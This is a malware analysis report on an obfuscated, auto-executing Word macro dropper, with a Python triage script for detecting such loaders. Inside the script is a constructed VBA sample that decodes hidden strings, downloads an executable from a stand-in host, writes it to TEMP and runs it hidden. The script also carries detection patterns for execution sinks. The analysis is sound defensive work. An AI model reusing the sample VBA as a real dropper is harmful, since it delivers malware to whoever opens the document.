Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 73632eaa1e787944…

MALICIOUS

Office (OLE) / .DOC

Size: 80.0 KB
Created: 2015-05-18 05:52:00
Authoring application: Microsoft Office Word
First seen: 2022-10-05

MD5: c4f638d0f56c386c8abc1c7768ed4697
SHA-1: eb089627a47506240d40abe5b3b37fafb885e111
SHA-256: 73632eaa1e787944b0a3861e6193806c5d6c940f4baee44a3416092161937cd6

Risk Score: 320

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell

The critical heuristic OLE_VBA_HTTP_DROP_EXEC indicates that the VBA macro reads an HTTP response body and writes it to disk. The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER indicates that the auto-exec routine rebuilds its strings at runtime with a custom decoder before passing them to CreateObject and a Shell execution sink, which keeps the COM ProgIDs, URL and command line out of the visible macro source and defeats plain keyword scanning. The AutoOpen entry point means the chain runs as soon as the document is opened in Word with macros enabled; no further user action is required. Taken together, the macro is a download-and-execute dropper whose purpose is to fetch a second-stage payload and run it. No network indicator is listed among the extracted artifacts, so the download URL and the second-stage payload are not identified by this static report alone.

Heuristics 7

  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The module defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
  • CreateObject call high OLE_VBA_CREATEOBJ
    The macro instantiates COM objects by ProgID through CreateObject; this is the path by which the HTTP client and the ADODB.Stream writer used by the drop logic are obtained.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
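The two critical heuristics above describe a shape rather than fixed keywords: strings are rebuilt at runtime (numeric char arrays, hex literals, junk tokens stripped with Replace) and only then reach CreateObject, the HTTP client, ADODB.Stream.SaveToFile and Shell. The script below is an added example of how an analyst can reproduce that logic on extracted macro source; it is not the scanner's own implementation, and the VBA it runs on is constructed for illustration, not the macros.bas carved from this sample (the page does not reproduce that file). It decodes the three obfuscation shapes, then searches the source plus the recovered strings for an auto-exec entry point and the download, drop and execute sinks, and shows that a keyword scan over the raw source alone misses the HTTP client and the URL.

```python
"""Static triage of obfuscated VBA: recover strings hidden behind the decoder
shapes the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic names, then check for
the auto-exec + download + drop + execute chain. Illustrative code, not the
report's scanner."""
import re
from dataclasses import dataclass

# Constructed VBA in the shape the report describes. It is NOT the macro
# source extracted from the sample.
SAMPLE_VBA = r'''
Private Sub AutoOpen()
    Dim a() As Variant, i As Integer, p As String, e As String
    ' HTTP client ProgID is rebuilt from a numeric char array at runtime
    a = Array(77, 83, 88, 77, 76, 50, 46, 88, 77, 76, 72, 84, 84, 80)
    For i = LBound(a) To UBound(a): p = p & Chr(a(i)): Next
    Set h = CreateObject(p)
    ' URL is stored as a hex string and decoded by a helper
    u = HexDec("687474703a2f2f6578616d706c652e696e76616c69642f612e657865")
    h.Open "GET", u, False: h.send
    ' stream ProgID hidden behind junk tokens that Replace strips
    Set s = CreateObject(Replace("AD##OD##B.St##ream", "##", ""))
    s.Open: s.Type = 1: s.Write h.responseBody
    ' dropped filename assembled from Chr() calls
    e = Chr(115) & Chr(118) & Chr(99) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    s.SaveToFile Environ("TEMP") & "\" & e, 2
    Shell Environ("TEMP") & "\" & e, vbHide
End Sub
'''

AUTOEXEC = re.compile(r'\b(Auto_?Open|Auto_?Close|Auto_?Exec|Document_Open|'
                      r'Document_Close|Workbook_Open)\b', re.I)
CHAR_ARRAY = re.compile(r'Array\(\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*\)')
CHR_CHAIN = re.compile(r'(?:Chr[W$]?\(\s*\d{1,3}\s*\)\s*&\s*)+Chr[W$]?\(\s*\d{1,3}\s*\)')
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){4,})"')   # >= 8 hex digits, quoted
REPLACE_CALL = re.compile(r'Replace\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
URL = re.compile(r'https?://[^\s"\']+', re.I)
SINKS = {  # name -> pattern; searched over source plus recovered strings
    'com-instantiation': re.compile(r'\b(CreateObject|GetObject)\b', re.I),
    'http-client': re.compile(r'MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest', re.I),
    'disk-write': re.compile(r'ADODB\.Stream|SaveToFile|Scripting\.FileSystemObject', re.I),
    'execution': re.compile(r'\bShell\b|WScript\.Shell|\.Run\b|\.Exec\b|ShellExecute', re.I),
}


def printable(codes):
    """Return the decoded string only if every code is printable ASCII."""
    if codes and all(32 <= c < 127 for c in codes):
        return ''.join(map(chr, codes))
    return None


def decode_strings(src):
    """Apply each decoder shape and return the recovered cleartext strings."""
    found = []
    for m in CHAR_ARRAY.finditer(src):                       # Array(77, 83, ...)
        found.append(printable([int(x) for x in m.group(1).split(',')]))
    for m in CHR_CHAIN.finditer(src):                        # Chr(115) & Chr(118) ...
        found.append(printable([int(x) for x in re.findall(r'\d{1,3}', m.group(0))]))
    for m in HEX_LITERAL.finditer(src):                      # "6874...": hex-string decode
        found.append(printable(list(bytes.fromhex(m.group(1)))))
    for s, junk, rep in REPLACE_CALL.findall(src):           # Replace("AD##OD##B", "##", "")
        found.append(s.replace(junk, rep) if junk else s)
    return [f for f in found if f]


def find_sinks(text):
    return [name for name, pat in SINKS.items() if pat.search(text)]


@dataclass
class Triage:
    autoexec: list
    decoded: list
    sinks: list
    urls: list
    verdict: str


def triage(src):
    """Score a macro module the way the report's critical heuristics do."""
    decoded = decode_strings(src)
    expanded = src + '\n' + '\n'.join(decoded)   # search the recovered strings too
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    sinks = find_sinks(expanded)
    urls = URL.findall(expanded)
    if autoexec and {'execution', 'disk-write'} <= set(sinks) and ('http-client' in sinks or urls):
        verdict = 'download-drop-execute loader'
    elif autoexec and sinks:
        verdict = 'auto-exec with suspicious sinks'
    else:
        verdict = 'no auto-exec loader shape'
    return Triage(autoexec, decoded, sinks, urls, verdict)


if __name__ == '__main__':
    r = triage(SAMPLE_VBA)
    print('visible on raw source :', find_sinks(SAMPLE_VBA), URL.findall(SAMPLE_VBA))
    print('after decoding        :', r.sinks, r.urls)
    print('recovered strings     :', r.decoded)
    print('auto-exec entry points:', r.autoexec, '->', r.verdict)
```

Run it against the output of olevba (the source the report lists as macros.bas) rather than the constructed sample to triage a real document. The decoders are deliberately narrow: they only emit a string when every byte is printable ASCII, which keeps binary blobs and random hex out of the indicator list, and the verdict requires the whole chain (entry point, network fetch or URL, disk write, execution) rather than any single keyword, mirroring how the two critical heuristics are defined above.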

Extracted artifacts 1

Files carved from inside the sample during analysis.

  • macros.bas
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source)
    Size: 6817 bytes
    SHA-256: f42b93532b8632dcabe334d276df79ed4763e13c6b199681391dab06cd7ac0f5